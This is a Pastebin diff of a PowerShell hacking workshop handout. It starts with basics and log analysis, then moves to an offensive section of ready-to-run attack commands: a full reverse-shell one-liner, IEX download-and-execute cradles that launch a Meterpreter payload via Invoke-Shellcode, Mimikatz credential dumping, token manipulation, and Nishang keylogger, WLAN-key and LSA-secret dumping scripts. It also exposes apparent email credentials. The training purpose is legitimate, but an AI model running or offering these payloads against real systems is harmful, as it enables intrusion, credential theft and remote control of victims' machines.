View difference between Paste ID: G0r96GCg and cM8zRq7C
SHOW: | | - or go back to the newest paste.
1-
Powershell Class Video:
1+
Day 1: Video
2-
https://s3.amazonaws.com/StrategicSec-Videos/2015-10-31+09.04+Hacking+with+Powershell+Workshop.mp4
2+
3
4
Video Remake:
5
https://s3.amazonaws.com/StrategicSec-Videos/_2015_7_11_rec-lw-us-10_267797_recording.mp4
6-
Old Powershell Video:
6+
7
8
#######################
9
# VMs for this course #
10
#######################
11
https://s3.amazonaws.com/StrategicSec-VMs/Win7x64.zip
12
	username: workshop
13
	password: password
14
	
15
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
16
	username: strategicsec
17
	password: strategicsec	
18
19
You can do the updates in the Win7 VM (yes, it is a lot of updates).
20
21
You'll need to create directory in the Win7 VM called "c:\ps"
22
23
In this file you will also need to change the text 'Strategic-Sec-Ubuntu-VM-IP' to the IP address of your Ubuntu host.
24
25
26
27
#####################
28
# Powershell Basics #
29
#####################
30
31
PowerShell is Microsoft’s new scripting language that has been built in since the release Vista. 
32
33
PowerShell file extension end in .ps1 . 
34
35
An important note is that you cannot double click on a PowerShell script to execute it. 
36
37
To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
38
39
dir 
40
cd 
41
ls
42
cd c:\
43
44
45
To obtain a list of cmdlets, use the Get-Command cmdlet
46
47
Get-Command
48
 
49
50
51
You can use the Get-Alias cmdlet to see a full list of aliased commands.
52
53
Get-Alias
54
55
56
57
Don't worry you won't blow up your machine with Powershell
58
Get-Process | stop-process 				What will this command do?
59
Get-Process | stop-process -whatif
60
61
62
To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
63
64
Get-Help Get-Command
65
66
Get-Help Get-Service –online
67
68
Get-Service -Name TermService, Spooler
69
70
Get-Service –N BITS
71
72
Start-Transcript 
73
74
PowerShell variables begin with the $ symbol. First lets create a variable
75
76
$serv = Get-Service –N Spooler
77
78
To see the value of a variable you can just call it in the terminal.
79
80
$serv
81
82
$serv.gettype().fullname
83
 
84
85
Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
86
87
$serv | Get-Member
88
89
Get-Member -InputObject $serv
90
91
 
92
93
94
95
Let’s use a method and a property with our object. 
96
97
$serv.Status
98
$serv.Stop()
99
$serv.Refresh()
100
$serv.Status
101
$serv.Start()
102
$serv.Refresh()
103
$serv.Status
104
 
105
106
107
108
Methods can return properties and properties can have sub properties. You can chain them together by appending them to the first call.
109
110
111
112
#############################
113
# Simple Event Log Analysis #
114
#############################
115
116
Step 1: Dump the event logs
117
---------------------------
118
The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
119
120
To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs. 
121
If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
122
123
Get-EventLog -LogName application | Export-Clixml Applog.xml
124
125
type .\Applog.xml
126
127
$logs = "system","application","security"
128
129
The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
130
131
$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
132
133
134
135
Step 2: Import the event log of interest
136
----------------------------------------
137
To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files. 
138
Store the results in a variable. 
139
Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object. 
140
141
The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
142
143
$seclog = Import-Clixml security.xml
144
145
$seclog | select -Last 5
146
147
148
Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
149
150
Get-EventLog Application -After (Get-Date).AddDays(-1)
151
152
You can use '-after' and '-before' to filter date ranges
153
154
One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything. 
155
By default, an ordinary user does not have permission to read the security log. 
156
157
158
Step 3: Drill into a specific entry
159
-----------------------------------
160
To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties. 
161
162
163
$seclog | select -first 1 | fl *
164
165
The message property contains the SID, account name, user domain, and privileges that are assigned for the new login. 
166
167
168
($seclog | select -first 1).message
169
170
(($seclog | select -first 1).message).gettype()
171
172
173
174
In the *nix world you often want a count of something (wc -l). 
175
How often is the SeSecurityPrivilege privilege mentioned in the message property? 
176
To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
177
178
$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
179
180
If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property. 
181
182
183
$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
184
185
Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present. 
186
Use the count property to determine the total number of entries in the event log.
187
188
$seclog.Count
189
190
191
192
193
194
195
############################
196
# Simple Log File Analysis #
197
############################
198
199
200
You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
201
202
203
mkdir c:\ps
204
cd c:\ps
205
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
206
207
208
209
210
	
211
	
212
	
213
214
###############################################
215
# Intrusion Analysis Using Windows PowerShell #
216
###############################################
217
218
Download sample file http://pastebin.com/raw.php?i=ysnhXxTV into the c:\ps directory
219
220
221
222
223
224
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
225
226
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt 
227
228
229
230
231
The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
232
233
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
234
235
236
237
238
To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
239
240
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
241
242
243
244
To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output. 
245
246
Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
247
248
249
250
Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses. 
251
252
Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
253
254
255
In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
256
This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
257
258
Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
259
260
261
262
263
This will get the setting for logs in the windows firewall which should be enabled in GPO policy for analysis. 
264
The command shows that the Firewall log is at:
265
%systemroot%\system32\LogFiles\Firewall\pfirewall.log, in order to open the file PowerShell will need to be run with administrative privileges.
266
267
268
First step is to get the above command into a variable using script logic.
269
Thankfully PowerShell has a built-in integrated scripting environment, PowerShell.ise. 
270
271
netsh advfirewall show allprofiles | Select-String FileName | select -ExpandProperty line | Select-String “%systemroot%.+\.log" | select -ExpandProperty matches | select -ExpandProperty value | sort –uniq
272
273
274
##############################################
275
# Parsing Log files using windows PowerShell #
276
##############################################
277
278
Download the sample IIS log http://pastebin.com/LBn64cyA 
279
280
281
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
282
283
Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}  
284
285
286
287
The above command would give us all the WebDAV requests.
288
289
To filter this to a particular user name, use the below command:
290
291
Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}  
292
293
 
294
295
Some more options that will be more commonly required : 
296
297
For Outlook Web Access : Replace WebDAV with OWA 
298
299
For EAS : Replace WebDAV with Microsoft-server-activesync 
300
301
For ECP : Replace WebDAV with ECP
302
303
 
304
305
To find out the count of the EWS request we can go ahead and run the below command
306
307
(Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "Useralias")}).count
308
309
310
311
312
313
####################################################################
314
# Windows PowerShell: Extracting Strings Using Regular Expressions #
315
####################################################################
316
To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
317
318
1) The input file that will be parsed
319
320
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
321
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
322
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
323
324
2) The regular expression that the input file will be compared against
325
326
3) The output file for where the extracted data will be placed.
327
328
Windows PowerShell has a “select-string” cmdlet which can be used to quickly scan a file to see if a certain string value exists. 
329
Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
330
331
To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
332
333
$input_path = ‘c:\ps\emails.txt’
334
$output_file = ‘c:\ps\extracted_addresses.txt’
335
$regex = ‘\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b’
336
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
337
338
In this script, we have the following variables:
339
340
1) $input_path to hold the path to the input file we want to parse
341
342
2) $output_file to hold the path to the file we want the results to be stored in
343
344
3) $regex to hold the regular expression pattern to be used when the strings are being matched.
345
346
The select-string cmdlet contains various parameters as follows:
347
348
1) “-Path” which takes as input the full path to the input file
349
350
2) “-Pattern” which takes as input the regular expression used in the matching process
351
352
3) “-AllMatches” which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to “$.Matches” and then “$_.Value” which represent using the current values of all the matches.
353
354
Using “>” the results are written to the destination specified in the $output_file variable.
355
356
Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
357
358
IP addresses
359
------------
360
For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
361
362
$input_path = ‘c:\ps\ip_addresses.txt’
363
$output_file = ‘c:\ps\extracted_ip_addresses.txt’
364
$regex = ‘\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b’
365
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
366
367
368
URLs
369
----
370
For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt. 
371
You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
372
373
$input_path = ‘c:\ps\URL_addresses.txt’
374
$output_file = ‘c:\ps\extracted_URL_addresses.txt’
375
$regex = ‘([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?’
376
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
377
378
379
In addition to the examples above, many other types of strings can be extracted using this script. 
380
All you need to do is switch the regular expression in the “$regex” variable! 
381
In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
382
383
384
385
#################################
386
# Packet Sniffer For Powershell #
387
#################################
388
389
Reference:
390
http://poshcode.org/764
391
http://blog.robbiefoust.com/?p=68
392
http://blog.robbiefoust.com/?p=9
393
394
I was looking for a Powershell script that would capture raw IP packets on the network and shove them into an object, but the only one I was able to find was a commercial cmdlet that was out of my budget. So, I decided that I would attempt to write my own. I figured it would be a great learning exercise (and it was), but I went into the project with the goal of avoiding any 3rd party software, to avoid compiling anything (like a cmdlet written in C#), and I didn’t want to install a driver shim. In other words, I wanted a plain ‘ol script that could be run on any computer.
395
396
I basically spent a lot of time googling and I got a lot of help from the guys over in the #Powershell IRC channel (irc.freenode.net). All of that combined with trial-and-error, I give you…. *drumroll* get-packet.ps1.
397
398
The script recognizes IPv4 TCP, UDP, ICMP, and IGMP packets (for now). The thing that took me the longest amount of time trying to figure out was how to get all packets that the network card was seeing on the wire, not just packets destined for my IP address and a particular port number. The solution was hard to find but wasn’t terribly difficult to understand.
399
400
# Create a new socket... SocketType should be Raw, and ProtocolType must be IP for promiscuous mode.
401
$socket = new-object system.net.sockets.socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP)
402
403
# Include the IP header so we get the full packet
404
$socket.setsocketoption("IP","HeaderIncluded",$true)
405
406
# bind to a local IP address$ipendpoint = new-object system.net.ipendpoint([net.ipaddress]"$localIP",0)$socket.bind($ipendpoint)
407
408
# this switches the NIC driver into promiscuous mode.  This requires admin rights.
409
[void]$socket.iocontrol([net.sockets.iocontrolcode]::ReceiveAll,$byteIn,$byteOut)
410
I read somewhere that .net sockets really just uses winsock under the hood, so it really helped my understanding to read both the winsock and dotnet documentation regarding sockets on msdn. I won’t bother repeating what that documentation says here but if you’re trying to decypher this script and can’t quite figure it out, feel free to ask questions and I’ll try to explain.
411
412
Something else that I probably knew at one point but had since forgotten was that the byte order on the network wire is reversed. On the wire it is “Big Endian” and on the PC it is “Little Endian.” Wikipedia has a great explanation on Endianness. Figuring out how to interpret the IP packets was the next biggest time suck and endianness was a large part of it. Once I realized that NetworkToHostOrder didn’t support unsigned ints, I simply wrote a few functions to reverse the byte order (from “Network” to “Host”) and used BitConverter to return the correct data type.
413
414
# Takes a 2 byte array, switches it from big endian to little endian, and converts it to uint16.
415
function NetworkToHostUInt16 ($value) { [Array]::Reverse($value) [BitConverter]::ToUInt16($value,0) }
416
417
# Takes a 4 byte array, switches it from big endian to little endian, and converts it to uint32.
418
function NetworkToHostUInt32 ($value) { [Array]::Reverse($value) [BitConverter]::ToUInt32($value,0) }
419
420
# Takes a byte array, switches it from big endian to little endian, and converts it to a string.
421
function ByteToString ($value) { $AsciiEncoding = new-object system.text.asciiencoding $AsciiEncoding.GetString($value) }
422
After getting all the data out of the packets, I shove the ones I really want into a psobject. When running the script, it will be visually more appealing if you pipe the output to format-table.
423
424
PS C:\> ./get-packet.ps1 | ft
425
There are a lot more protocol types that I could be looking for, and I’ll probably add some of the more common ones eventually. I’ve also looked into adding support to export and import the libpcap file format, but after looking at the libpcap source code, there’s a lot of ugly in there that I might just avoid for now.
426
427
quick way to done this is
428
429
(new-object System.Net.WebClient).DownloadFile("http://poshcode.org/get/764", "c:\ps\get-packet.ps1")
430
PS C:\> ./get-packet.ps1 | ft
431
432
try to open some web page
433
434
435
###################
436
# Pentester Tasks #
437
###################
438
Reference:
439
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
440
441
442
Listing IPs
443
One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one
444
445
$octect = "192.168.6."
446
$lastoctect = (1..255)
447
$lastoctect | ForEach-Object {write-host "$($octect)$($_)"}
448
449
Ping Sweep
450
PowerShell provides several methods for doing Ping
451
Test-Connection cmdlet
452
Creation of a WMI Object
453
.Net System.Net.NetworkInformation.Ping Object
454
455
function New-IPRange ($start, $end) {
456
$ip1 = ([System.Net.IPAddress]$start).GetAddressBytes()
457
[Array]::Reverse($ip1)
458
$ip1 = ([System.Net.IPAddress]($ip1 -join '.')).Address
459
460
$ip2 = ([System.Net.IPAddress]$end).GetAddressBytes()
461
[Array]::Reverse($ip2)
462
$ip2 = ([System.Net.IPAddress]($ip2 -join '.')).Address
463
464
for ($x=$ip1; $x -le $ip2; $x++) {
465
$ip = ([System.Net.IPAddress]$x).GetAddressBytes()
466
[Array]::Reverse($ip)
467
$ip -join '.'
468
}
469
}
470
$ping = New-Object System.Net.NetworkInformation.Ping
471
New-IPRange 192.168.6.1 192.168.6.150 | ForEach-Object {$ping.Send($_, 100)} | where {$_.status -eq "Success"}
472
473
Reverse Lookups
474
For reverse lookups using .Net Class we use the [System.Net.Dns]::GetHostEntry(IP) method Returns System.Net.IPHostEntry
475
476
[System.Net.Dns]::GetHostByAddress("204.244.123.113")
477
478
479
Forward Lookups
480
481
[System.Net.Dns]::GetHostAddresses("www.google.com")
482
483
Port Scans
484
To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library
485
For TCP the .Net System.Net.Sockets.TcpClient
486
For UDP the .Net System.Net.Sockets.UdpClient
487
TCP Scan
488
489
$ports=22,80
490
$target = "Strategic-Sec-Ubuntu-VM-IP"
491
foreach ($i in $ports) {
492
try {
493
$socket = new-object System.Net.Sockets.TCPClient($target, $i);
494
} catch {}
495
if ($socket -eq $NULL) {
496
echo "$target:$i - Closed";
497
} else {
498
echo "$target:$i - Open";
499
$socket = $NULL;
500
}}
501
502
503
PARSING NMAP RESULT
504
Run Powershell as administrator
505
506
cd C:\
507
508
Get-ExecutionPolicy
509
Set-ExecutionPolicy Unrestricted –Force
510
511
512
513
Parse nmap XML
514
.\parse-nmap.ps1 samplescan.xml
515
516
Process all XML files
517
518
.\parse-nmap.ps1 *.xml
519
520
Piping also works
521
dir *.xml | .\parse-nmap.ps1
522
523
Advanced parsing with filtering conditions
524
.\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS
525
526
More parsing
527
.\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"}
528
529
Parsing with match and multiple conditions
530
.\parse-nmap.ps1 samplescan.xml |where {$_.Ports -match "open:tcp:80|open:tcp:443"}
531
532
CSV Export
533
.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv
534
535
Import Data from CSV
536
$data = import-csv weblisteners.csv
537
$data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}
538
539
Export to HTML
540
.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " |select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html
541
542
543
544
545
Nessus with PowerShell
546
547
Let’s take a look at the Import-Csv cmdlet and what are the members of the object it returns:
548
549
Import-Csv C:\class_nessus.csv | Get-Member
550
551
filter the objects:
552
553
Import-Csv C:\class_nessus.csv | where {$_.risk -eq "high"}
554
555
use the Select-Object cmdlet and only get unique entries:
556
557
Import-Csv C:\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique
558
559
Import-Csv C:\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView
560
561
 
562
ConvertTo-Html cmdlet and turn it in to an HTML report in list format:
563
564
Import-Csv C:\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html
565
566
567
568
569
570
****************************
571
Reverseshell with PowerShell
572
****************************
573
nc -lvp 1234			(command prompt 1)
574
575
576
				(command prompt 2)
577
powershell -command "function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()};  if ($process.ExitCode -ne $null) {$process.Close()};  exit;  };$address = '127.0.0.1';  $port = '1234';$client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ;$stream = $client.GetStream();$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize  ;$process = New-Object System.Diagnostics.Process  ;$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'  ;$process.StartInfo.RedirectStandardInput = 1  ;$process.StartInfo.RedirectStandardOutput = 1;$process.StartInfo.UseShellExecute = 0  ;$process.Start()  ;$inputstream = $process.StandardInput  ;$outputstream = $process.StandardOutput  ;Start-Sleep 1  ;$encoding = new-object System.Text.AsciiEncoding  ;while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};$stream.Write($encoding.GetBytes($out),0,$out.Length)  ;$out = $null; $done = $false; $testing = 0; ;while (-not $done) {if ($client.Connected -ne $true) {cleanup}  ;$pos = 0; $i = 1;  while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos);  $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}  ;if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos);  $inputstream.write($string);  start-sleep 1;  if ($process.ExitCode -ne $null) {ReverseShellClean};else {  $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){;  $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}};  $stream.Write($encoding.GetBytes($out),0,$out.length);  $out = $null;  $string = $null}} else {ReverseShellClean}};"
578
579
580
####################################################
581
# Running Powershell From A Command Prompt         #
582
# Using Powersploit & Nishang			           #
583
####################################################
584
585
COMMAND & 1 PARAMATER SYNTAX:		
586
	powershell -command "& {&'some-command' someParam}"
587
588
589
590
MULTIPLE COMMAND & PARAMETER SYNTAX
591
	powershell -command "& {&'some-command' someParam}"; "& {&'some-command' -SpecificArg someParam}"
592
593
594
595
Tools to download to the web root (/var/www) of your StrategicSec-Ubuntu-VM:
596
https://github.com/mattifestation/PowerSploit.git
597
https://github.com/samratashok/nishang
598
599
from the strategicsec home dir copy nc.exe to /var/www/ folder
600
601
user:strategicsec
602
pass:strategicsec
603
604
sudo cp nc.exe. /var/www
605
606
cd /var/www
607
sudo git clone https://github.com/samratashok/nishang
608
sudo git clone https://github.com/mattifestation/PowerSploit
609
610
611
********************************** Simple Ping Sweep **********************************
612
powershell -command "50..100 | % {\""192.168.6.$($_): $(Test-Connection -count 1 -comp 192.168.6.$($_) -quiet)\""}"
613
614
615
616
617
618
********************************** Simple Port 445 Sweep **********************************
619
powershell -command "1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.6.$_\"",445)) \""192.168.6.$_\""} 2>$null"
620
621
622
623
624
625
626
********************************** Simple Port Scan **********************************
627
powershell -command "1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.6.XX\"",$_)) \""$_ is open\""} 2>$null"
628
629
630
631
632
633
634
********************************** Download a file **********************************
635
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nc.exe', 'nc.exe’)"
636
637
638
639
640
641
********************************** Downloading files: Binaries **********************************
642
powershell -command "(New-ObjectSystem.Net.WebClient).DownloadFile("http://Strategic-Sec-Ubuntu-VM-IP/nc.exe","c:\nc.exe“)" 
643
644
645
646
647
648
********************************** Text file stdout to local file  **********************************
649
(New-Object System.Net.WebClient).DownloadString("http://Strategic-Sec-Ubuntu-VM-IP/PowerSploit/CodeExecution/Invoke-Shellcode.ps1") | Out-File -Encoding ASCII Invoke-Shellcode.ps1 
650
651
652
653
654
********************************** Powershell Download & Execute Reverse Meterpreter **********************************
655
from ubuntu host browse to metasploit folder 
656
cd ~/toolz/metasploit/
657
658
sudo ./msfconsole
659
use exploit/multi/handler
660
set ExitOnSession false
661
set payload windows/meterpreter/reverse_https
662
set LHOST Strategic-Sec-Ubuntu-VM-IP
663
set LPORT 443
664
set EXITFUNC thread
665
exploit -j
666
667
668
669
powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost Strategic-Sec-Ubuntu-VM-IP -Lport 443 -Force"
670
671
672
673
674
675
********************************** Payload which could execute shellcode from DNS TXT queries. **********************************
676
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Execution/Execute-DNSTXT-Code.ps1','%TEMP%\Execute-DNSTXT-Code.ps1')
677
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Execute-DNSTXT-Code.ps1 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com
678
679
680
681
682
683
684
powershell -command "IEX (New-Object Net.WebClient).DownloadString('http://Strategic-Sec-Ubuntu-VM-IP/powersploit/Exfiltration/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz" 
685
686
687
688
689
690
691
692
693
694
********************************** Run mimikatz via powershell  (must be run as SYSTEM) **********************************
695
powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Mimikatz.ps1') | Out-File -Encoding ASCII Invoke-Mimikatz.ps1; Import-Module .\Invoke-Mimikatz.ps1 ; Invoke-Mimikatz"
696
697
698
699
700
701
********************************** Token Manipulation to escalate (must be run as an Administrator) **********************************
702
powershell -command "IEX (New-Object Net.WebClient).DownloadString('http://Strategic-Sec-Ubuntu-VM-IP/powersploit/Exfiltration/Invoke-TokenManipulation.ps1') ; Invoke-TokenManipulation" 
703
704
powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-TokenManipulation.ps1') | Out-File -Encoding ASCII Invoke-TokenManipulation.ps1; Import-Module .\Invoke-TokenManipulation.ps1 ; Invoke-TokenManipulation"
705
706
707
708
709
710
711
712
713
********************************** Nihsang payload which Scan IP-Addresses, Ports and HostNames **********************************
714
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Invoke-PingSweep.ps1','%TEMP%\Invoke-PingSweep.ps1')
715
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-PingSweep.ps1 -StartAddress 192.168.6.50 -EndAddress 192.168.6.100 -ResolveHost -ScanPort
716
717
718
719
720
721
722
********************************** Nihsang payload which Scan IP-Addresses, Ports and HostNames **********************************
723
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Port-Scan.ps1','%TEMP%\Port-Scan.ps1')
724
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Port-Scan.ps1 -StartAddress 192.168.6.50 -EndAddress 192.168.6.100 -ResolveHost -ScanPort
725
726
727
728
729
730
********************************** Nishang Payload which gathers juicy information from the target. **********************************
731
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Get-Information.ps1','%TEMP%\Get-Information.ps1')
732
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-Information.ps1
733
734
735
736
737
738
********************************** Nishang Payload which gathers juicy information from the target. **********************************
739
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Information_Gather.ps1','%TEMP%\Information_Gather.ps1')
740
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Information_Gather.ps1
741
742
743
744
745
746
********************************** Nishang script which can drop and execute executables on multiple computers. **********************************
747
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Run-EXEonRemote.ps1','%TEMP%\Run-EXEonRemote.ps1')
748
powershell.exe -ExecutionPolicy Bypass -command Invoke-Command -FilePath %TEMP%\Run-EXEonRemote.ps1 -ComputerName Test-PC
749
750
751
752
753
754
********************************** Nishang Payload which logs keys. **********************************
755
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Keylogger.ps1','%TEMP%\Keylogger.ps1')
756
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Keylogger.ps1 16e7a8a83f04eec8ab6bc1bce9d103e3 juraghh@gmail.com ITp!Ka3099 1 http://example.com stopthis
757
758
759
760
761
762
********************************** Nishang Payload which silently browses to a URL and accepts Java Applet Run Warning **********************************
763
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Browse_Accept_Applet.ps1','%TEMP%\Browse_Accept_Applet.ps1')
764
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Browse_Accept_Applet.ps1 http://Strategic-Sec-Ubuntu-VM-IP:8080/JavaExploit
765
 
766
767
768
769
********************************** Nishang Payload which dumps keys for WLAN profiles. **********************************
770
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Get-WLAN-Keys.ps1','%TEMP%\Get-WLAN-Keys.ps1')
771
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-WLAN-Keys.ps1
772
773
774
775
776
777
********************************** Nishang payload which extracts LSA Secrets from local computer. **********************************
778
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Get-LSASecret.ps1','%TEMP%\Get-LSASecret.ps1')
779
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-LSASecret.ps1 -filename .\servers.txt
780
781
782
783
784
785
786
787
788
789
790
791
##########################
792
#Phishing with PowerShell#
793
##########################
794
795
Reference:
796
http://securitypadawan.blogspot.com/2014/01/phishing-with-powershell.html
797
http://www.rapid7.com/db/modules/exploit/windows/misc/psh_web_delivery
798
799
